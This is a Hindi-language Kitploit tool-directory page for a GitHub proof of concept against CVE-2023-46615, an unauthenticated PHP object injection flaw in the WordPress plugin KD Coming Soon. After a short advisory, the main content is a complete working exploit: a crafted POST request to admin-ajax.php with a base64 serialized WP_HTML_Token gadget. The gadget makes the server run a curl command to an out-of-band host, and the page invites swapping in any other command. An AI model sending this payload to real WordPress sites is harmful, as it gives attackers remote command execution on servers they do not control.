Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-46615 — KD Coming Soon <= 1.7 - अप्रमाणित PHP ऑब्जेक्ट इंजेक्शन cetitle के माध्यम से | Kitploit
उपकरण/GitHubGitHub/randomrobbiebf/cve-2023-46615
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubrandomrobbiebf/cve-2023-46615

CVE-2023-46615

KD Coming Soon <= 1.7 - अप्रमाणित PHP ऑब्जेक्ट इंजेक्शन cetitle के माध्यम से

रिपॉजिटरी देखें
12 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-46615

KD Coming Soon <= 1.7 - cetitle के माध्यम से अप्रमाणित PHP Object Injection

विवरण:

वर्डप्रेस के लिए KD Coming Soon प्लगइन सभी संस्करणों में, 1.7 तक और इसमें शामिल, PHP Object Injection के प्रति संवेदनशील है, जो कमजोर kd_cemailer फ़ंक्शन में अविश्वसनीय इनपुट cetitle के डिसीरियलाइज़ेशन के माध्यम से होता है। यह अप्रमाणित हमलावरों के लिए एक PHP ऑब्जेक्ट इंजेक्ट करना संभव बनाता है। कमजोर प्लगइन में कोई POP श्रृंखला मौजूद नहीं है। यदि लक्ष्य प्रणाली पर स्थापित किसी अतिरिक्त प्लगइन या थीम के माध्यम से कोई POP श्रृंखला मौजूद है, तो यह हमलावर को मनमानी फ़ाइलों को हटाने, संवेदनशील डेटा प्राप्त करने, या कोड निष्पादित करने की अनुमति दे सकता है।

root@kitploit:~
Severity: high
CVE ID: CVE-2023-46615
CVSS Score: 8.1
CVSS Metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Plugin Slug: kd-coming-soon
WPScan URL: https://www.wpscan.com/plugin/kd-coming-soon
Reference URL: https://www.wordfence.com/threat-intel/vulnerabilities/id/0f831d48-733a-4e79-8559-92b03b8d0356

POC

केवल WordPress 6.4+ के लिए काम करता है

root@kitploit:~
POST /wp-admin/admin-ajax.php?action=kd_cemailer&nonce=c0465c51ee HTTP/1.1
Host: wordpress.lan
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 231
Origin: http://wordpress.lan
Connection: close
Referer: http://wordpress.lan/

action=kd_cemailer&cetitle=TzoxMzoiV1BfSFRNTF9Ub2tlbiI6Mjp7czoxMzoiYm9va21hcmtfbmFtZSI7czo0OToiY3VybCB1NHpjNXI5N3B2ZnF1NHgwMXNlenRlbmprYXExZXUyai5vYXN0aWZ5LmNvbSI7czoxMDoib25fZGVzdHJveSI7czo2OiJzeXN0ZW0iO30%3d&email=test%40Test.com

URL डिकोड और base64 डिकोड करें TzoxMzoiV1BfSFRNTF9Ub2tlbiI6Mjp7czoxMzoiYm9va21hcmtfbmFtZSI7czo0OToiY3VybCB1NHpjNXI5N3B2ZnF1NHgwMXNlenRlbmprYXExZXUyai5vYXN0aWZ5LmNvbSI7czoxMDoib25fZGVzdHJveSI7czo2OiJzeXN0ZW0iO30%3d और कर्ल कमांड को बदलें O:13:"WP_HTML_Token":2:{s:13:"bookmark_name";s:49:"curl u4zc5r97pvfqu4x01seztenjkaq1eu2j.oastify.com";s:10:"on_destroy";s:6:"system";}

टूल डाउनलोड करें